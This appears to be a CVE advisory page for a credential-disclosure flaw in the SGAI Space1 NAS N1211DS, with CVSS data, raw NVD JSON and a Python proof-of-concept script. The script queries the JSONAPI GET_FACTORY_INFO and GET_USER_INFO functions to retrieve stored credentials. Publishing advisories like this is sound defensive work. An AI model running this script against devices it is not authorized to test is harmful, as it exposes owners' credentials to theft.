Security Vulnerability Report
CVE-2025-14183 CVSS 4.3 MEDIUM

CVE-2025-14183

Published: 2025-12-07 03:16:00
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in SGAI Space1 NAS N1211DS up to 1.0.915. This issue affects the function GET_FACTORY_INFO/GET_USER_INFO of the file /cgi-bin/JSONAPI of the component gsaiagent. The manipulation results in unprotected storage of credentials. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SGAI Space1 NAS N1211DS up to 1.0.915 (as stated in the description above)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
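import requests

# CVE-2025-14183 check - SGAI Space1 NAS Credential Disclosure
# Device: SGAI Space1 NAS N1211DS
# Vulnerability: Unprotected storage of credentials in /cgi-bin/JSONAPI
#
# NOTE(review): the requests below carry no session or credentials, while the
# CVSS vector published for this CVE lists PR:L (low privileges required).
# Which of the two holds for a given firmware is not shown here, so confirm
# it on the device under test before drawing conclusions from the result.

target_ip = "192.168.1.100"  # Replace with the address of the device under test
target_port = 80


def exploit_credential_disclosure():
    """Query the two JSONAPI functions named in CVE-2025-14183.

    Sends one GET request each for ``GET_FACTORY_INFO`` and ``GET_USER_INFO``
    to ``/cgi-bin/JSONAPI`` on ``target_ip:target_port``. The requests use
    plain HTTP, so whatever the device returns crosses the network
    unencrypted.

    Returns:
        A ``(factory_info, user_info)`` tuple holding the decoded JSON
        bodies, or ``(None, None)`` when a request fails, the device answers
        with an HTTP error status, or a body is not valid JSON.
    """
    api_url = f"http://{target_ip}:{target_port}/cgi-bin/JSONAPI"
    queries = (
        ("factory", "GET_FACTORY_INFO"),
        ("user", "GET_USER_INFO"),
    )

    print("[*] Exploiting CVE-2025-14183...")
    print(f"[*] Target: {target_ip}:{target_port}")

    results = []
    try:
        for label, function_name in queries:
            print(f"[*] Requesting {label} information...")
            response = requests.get(
                api_url, params={"function": function_name}, timeout=10
            )
            # An error page (login redirect target, 403, 404, ...) is not a
            # disclosure, so it must not be reported with a "[+]" line.
            response.raise_for_status()
            data = response.json()
            # The body may hold credentials. Print only its size and its
            # top-level field names so the values do not end up in terminal
            # scrollback or captured logs; the full data is still returned.
            fields = sorted(data) if isinstance(data, dict) else []
            print(
                f"[+] {label.capitalize()} Info Response: "
                f"HTTP {response.status_code}, "
                f"{len(response.content)} bytes, fields: {fields}"
            )
            results.append(data)
    except (requests.exceptions.RequestException, ValueError) as e:
        # ValueError covers a non-JSON body on requests versions where the
        # JSON decode error is not a RequestException subclass.
        print(f"[-] Error: {e}")
        return None, None

    return results[0], results[1]


if __name__ == "__main__":
    exploit_credential_disclosure()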

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14183", "sourceIdentifier": "[email protected]", "published": "2025-12-07T03:15:59.890", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in SGAI Space1 NAS N1211DS up to 1.0.915. This issue affects the function GET_FACTORY_INFO/GET_USER_INFO of the file /cgi-bin/JSONAPI of the component gsaiagent. The manipulation results in unprotected storage of credentials. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334603", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334603", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698566", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698567", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a8000b30bd543247fa1bd", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a80859264db63f2340d7a", "source": "[email protected]"}]}}